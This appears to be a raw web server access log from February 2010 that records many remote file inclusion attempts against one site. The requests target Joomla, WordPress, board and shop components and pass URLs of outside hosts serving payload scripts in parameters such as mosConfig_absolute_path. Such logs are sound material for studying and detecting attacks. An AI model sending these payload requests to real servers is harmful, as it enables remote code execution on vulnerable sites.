60.251.165.181 - - [07/Feb/2010:09:22:59 -0800] "GET /logs/access_100201.log//bbs/write_update.php?board_skin_path=http://www.h1cc.net/somd/images/topics/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:23:02 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:23:02 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:23:02 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:23:06 -0800] "GET /logs/access_100129.log%20%20/home.php?index=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:23:18 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:23:18 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:23:18 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
202.131.226.52 - - [07/Feb/2010:09:23:24 -0800] "GET /logs/access_100127.log/?mosConfig.absolute.path=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.131.226.52 - - [07/Feb/2010:09:23:24 -0800] "GET /?mosConfig.absolute.path=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
202.131.226.52 - - [07/Feb/2010:09:23:24 -0800] "GET /logs/?mosConfig.absolute.path=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:09:23:37 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:09:23:37 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.229 - - [07/Feb/2010:09:23:37 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:24:05 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:24:05 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:24:08 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:24:08 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:24:08 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:24:08 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:24:08 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:24:11 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:24:11 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:24:11 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [07/Feb/2010:09:24:22 -0800] "GET /logs/access_100107.log///vwar/backup/errors.php?error=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Feb/2010:09:25:12 -0800] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Feb/2010:09:25:12 -0800] "GET /logs/access_100108.log%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Feb/2010:09:25:12 -0800] "GET /logs///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:25:17 -0800] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:25:17 -0800] "GET /logs/access_100108.log%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:25:17 -0800] "GET /logs///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:25:23 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:25:27 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:25:32 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [07/Feb/2010:09:25:55 -0800] "GET /logs/access_100105.log///vwar/backup/errors.php?error=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:09:26:01 -0800] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mya.red-ab.com/ok/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:09:26:01 -0800] "GET /logs///components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mya.red-ab.com/ok/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:09:26:02 -0800] "GET /logs/access_091231.log%20%20///components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mya.red-ab.com/ok/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:26:08 -0800] "GET /logs/access_100123.log/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:26:16 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:26:16 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:26:19 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:26:22 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:26:22 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:26:27 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:26:53 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:26:53 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Feb/2010:09:26:53 -0800] "GET /logs/access_100104.log%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.155 - - [07/Feb/2010:09:26:55 -0800] "GET /logs/access_100104.log%20%20///skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:26:56 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:09:27:20 -0800] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mya.red-ab.com/ok/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:09:27:20 -0800] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mya.red-ab.com/ok/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:27:20 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:27:20 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:27:21 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:09:27:21 -0800] "GET /logs///components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mya.red-ab.com/ok/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:27:21 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:27:21 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:09:27:21 -0800] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mya.red-ab.com/ok/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:09:27:21 -0800] "GET /logs///components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mya.red-ab.com/ok/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:09:27:22 -0800] "GET /logs///components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mya.red-ab.com/ok/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:09:27:23 -0800] "GET /logs/access_091231.log///components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mya.red-ab.com/ok/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:09:27:24 -0800] "GET /logs/access_091231.log///components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mya.red-ab.com/ok/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:09:27:24 -0800] "GET /logs/access_091231.log///components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mya.red-ab.com/ok/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:27:25 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:27:25 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:27:25 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:27:26 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
193.226.34.74 - - [07/Feb/2010:09:28:01 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.smshitronics.com//administrator/components/com_virtuemart/classes/pdf/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.226.34.74 - - [07/Feb/2010:09:28:01 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.smshitronics.com//administrator/components/com_virtuemart/classes/pdf/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.226.34.74 - - [07/Feb/2010:09:28:01 -0800] "GET /logs/access_100103.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.smshitronics.com//administrator/components/com_virtuemart/classes/pdf/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.226.34.74 - - [07/Feb/2010:09:28:01 -0800] "GET /logs/access_100103.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.smshitronics.com//administrator/components/com_virtuemart/classes/pdf/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.226.34.74 - - [07/Feb/2010:09:28:01 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.smshitronics.com//administrator/components/com_virtuemart/classes/pdf/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.226.34.74 - - [07/Feb/2010:09:28:01 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.smshitronics.com//administrator/components/com_virtuemart/classes/pdf/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.226.34.74 - - [07/Feb/2010:09:28:26 -0800] "GET /logs/access_100119.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.smshitronics.com//administrator/components/com_virtuemart/classes/pdf/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.226.34.74 - - [07/Feb/2010:09:28:26 -0800] "GET /logs/access_100119.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.smshitronics.com//administrator/components/com_virtuemart/classes/pdf/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:09:29:30 -0800] "GET /logs/access_100112.log%20%20///components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mya.red-ab.com/ok/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:30:21 -0800] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:09:30:21 -0800] "GET /logs/access_100112.log///components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mya.red-ab.com/ok/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [07/Feb/2010:09:30:23 -0800] "GET /logs/access_100112.log///components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://mya.red-ab.com/ok/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:30:25 -0800] "GET /logs/access_100121.log%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:30:35 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [07/Feb/2010:09:30:40 -0800] "GET /delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [07/Feb/2010:09:30:41 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [07/Feb/2010:09:30:41 -0800] "GET /logs/access_100202.log//delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [07/Feb/2010:09:30:45 -0800] "GET /logs/access_100129.log//delete_comment.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:30:48 -0800] "GET /logs/access_100107.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:30:48 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:30:48 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:30:53 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:31:29 -0800] "GET /logs/access_100121.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:31:44 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:31:44 -0800] "GET /logs/access_100107.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [07/Feb/2010:09:31:44 -0800] "GET /logs/access_100121.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:09:32:17 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:09:32:18 -0800] "GET /logs/access_100110.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:09:32:18 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
93.174.121.139 - - [07/Feb/2010:09:32:51 -0800] "GET /logs/access_100103.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.131.226.52 - - [07/Feb/2010:09:34:25 -0800] "GET /logs/access_100127.log/?mosConfig.absolute.path=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.131.226.52 - - [07/Feb/2010:09:34:25 -0800] "GET /logs/?mosConfig.absolute.path=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.0" 200 4926 "-" "Mozilla/5.0" "www.puaga.com"
202.131.226.52 - - [07/Feb/2010:09:34:26 -0800] "GET /?mosConfig.absolute.path=http://www.msm.mn//pdf/S-/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
122.201.102.68 - - [07/Feb/2010:09:35:12 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.102.68 - - [07/Feb/2010:09:35:12 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.201.102.68 - - [07/Feb/2010:09:35:17 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.150.132.139 - - [07/Feb/2010:09:35:32 -0800] "GET /logs/access_100114.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.150.132.139 - - [07/Feb/2010:09:35:32 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.150.132.139 - - [07/Feb/2010:09:35:32 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.phoenix-haxor.cz.cc/Fx29ID.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:36:28 -0800] "GET /logs/home.php?index=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:36:29 -0800] "GET /home.php?index=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.125 - - [07/Feb/2010:09:36:32 -0800] "GET /logs/access_100117.log%20%20/home.php?index=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
